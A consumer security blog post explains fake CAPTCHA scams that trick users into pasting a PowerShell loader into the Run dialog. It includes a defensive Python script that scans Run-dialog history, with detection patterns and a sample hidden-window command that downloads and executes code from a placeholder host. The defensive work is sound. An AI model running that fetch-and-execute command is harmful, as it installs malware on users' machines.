A CAPTCHA is often read as a sign that a website takes security seriously, and users feel safer interacting with a page that shows one. Cybercriminals have taken advantage of that trust by building fake CAPTCHAs that trick users into installing malware. The tactic works, and in this post we look at how it functions and how you can avoid being caught out by this sort of scam.
Attackers have begun using CAPTCHAs to lend rogue websites an air of legitimacy, and several antivirus vendors have flagged the tactic. Unsuspecting users are led to such sites, and when they land on one they are met with a fake CAPTCHA that looks as close as possible to the real thing. This lowers suspicion, because most users are used to seeing CAPTCHAs on safe, professional sites.
Why you should be wary of fake CAPTCHAs
The scam typically begins with a user looking for pirated software, such as cracked video games, and landing on a site that claims to have it. When they try to access the content, a fake CAPTCHA appears. Once it is "completed", they are directed to take further action, pressing particular key combinations, which ultimately brings malware onto their computer.
The CAPTCHA puzzle itself does nothing; the malware arrives only when the user follows the "verification" steps shown after it. Each step looks innocent on its own, but together they hand control to malicious code without the user realising it. After the CAPTCHA appears, the user is told to press Win + R, CTRL + V, and Enter. Each keystroke seems harmless enough, but the sequence is the final step in an ingenious malware installation.
Behind the scenes, the fake CAPTCHA page writes a malicious PowerShell command to the user's clipboard. Win + R opens the Run dialog, CTRL + V pastes that command into it, and Enter runs it, fetching malware such as Lumma Stealer without the user knowing. Lumma Stealer is designed to steal personal data from infected devices and evade antivirus protections.
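As an added example (not code from the original post), the following Python helper triages the Windows Run dialog history, which Explorer keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, for commands that look like the pasted PowerShell loader described above. The heuristics, the sample entries and the function names are my assumptions; on Windows it reads the live key, elsewhere it runs over the constructed sample.

```python
import re

# Heuristics for a pasted loader command: assumptions drawn from public
# reporting on this scam, not from the article.
SUSPICIOUS_PATTERNS = [
    (r"\b(powershell|pwsh|mshta|cmd)(\.exe)?\b", "interpreter launched from Run dialog"),
    (r"-(w|windowstyle)\s+hidden", "hidden window"),
    (r"-(e|ec|enc|encodedcommand)\b", "encoded command"),
    (r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|curl|wget)\b", "network download"),
    (r"\b(iex|invoke-expression)\b", "dynamic execution"),
    (r"(i am not a robot|captcha|verif)", "CAPTCHA lure text appended as a comment"),
]

def triage_run_mru(entries, min_hits=2):
    """Score RunMRU entries (value name -> recorded command). Explorer stores each
    command with a trailing literal "\\1", stripped before matching. Returns
    (name, command, reasons) for entries with at least min_hits heuristic hits."""
    findings = []
    for name, raw in entries.items():
        if name == "MRUList": continue  # ordering index, not a command
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        reasons = [why for pat, why in SUSPICIOUS_PATTERNS if re.search(pat, cmd, re.IGNORECASE)]
        if len(reasons) >= min_hits:
            findings.append((name, cmd, reasons))
    return findings

def read_run_mru():
    """Read the live RunMRU key on Windows; return {} on other platforms."""
    try:
        import winreg
    except ImportError:
        return {}
    entries, index = {}, 0
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
            while True:
                name, value, _ = winreg.EnumValue(key, index)  # OSError when exhausted
                entries[name] = value
                index += 1
    except OSError:  # key absent or enumeration finished
        pass
    return entries

# Constructed sample of what the key might hold after the scam; not a real capture.
SAMPLE_RUN_MRU = {
    "MRUList": "bca",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iex (irm http://EXAMPLE.invalid/x)" # I am not a robot\\1',
    "c": "cmd\\1",
}
```

Call `triage_run_mru(read_run_mru() or SAMPLE_RUN_MRU)` to scan; only entry "b" reaches the default threshold, while a bare "cmd" is reported only with `min_hits=1`.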
How to spot and avoid fake CAPTCHAs
To avoid this trap, never trust a CAPTCHA unquestioningly, especially on an unfamiliar or suspicious website. Here are a few important tips to keep in mind:
- CAPTCHAs don't make you type things. If a CAPTCHA tells you to press keyboard shortcuts or run commands on your PC, treat that as a red flag.
- Legitimate CAPTCHAs are simple. Real CAPTCHAs typically ask you to solve a basic puzzle, such as selecting images containing a particular object or matching puzzle pieces. They never involve steps that require you to open additional tools such as PowerShell.
- Be careful about pirated software sites. Sites offering illegal downloads are the prime hunting ground for malicious CAPTCHAs. The surest way to avoid infection from pirated content is not to download it at all.
This is just one example of the new twists cybercriminals keep coming up with, which is why you can never be too sure when something unfamiliar appears. If you do find yourself facing one, remember the warning signs of a fake CAPTCHA:
- Stay vigilant.
- Question anything that seems off or unfamiliar, and ask whether a CAPTCHA is out of place on the website you're on.
- Proceed carefully, and you will stay ahead of the scammers.
Malware and CAPTCHAs have become dangerously intertwined, with criminals using fake CAPTCHAs to deliver malware. By staying aware of and up to date with these sneaky tactics, you can stay one step ahead of them and protect yourself and your devices.
Featured image credit: Furkan Demirkaya/Gencraft AI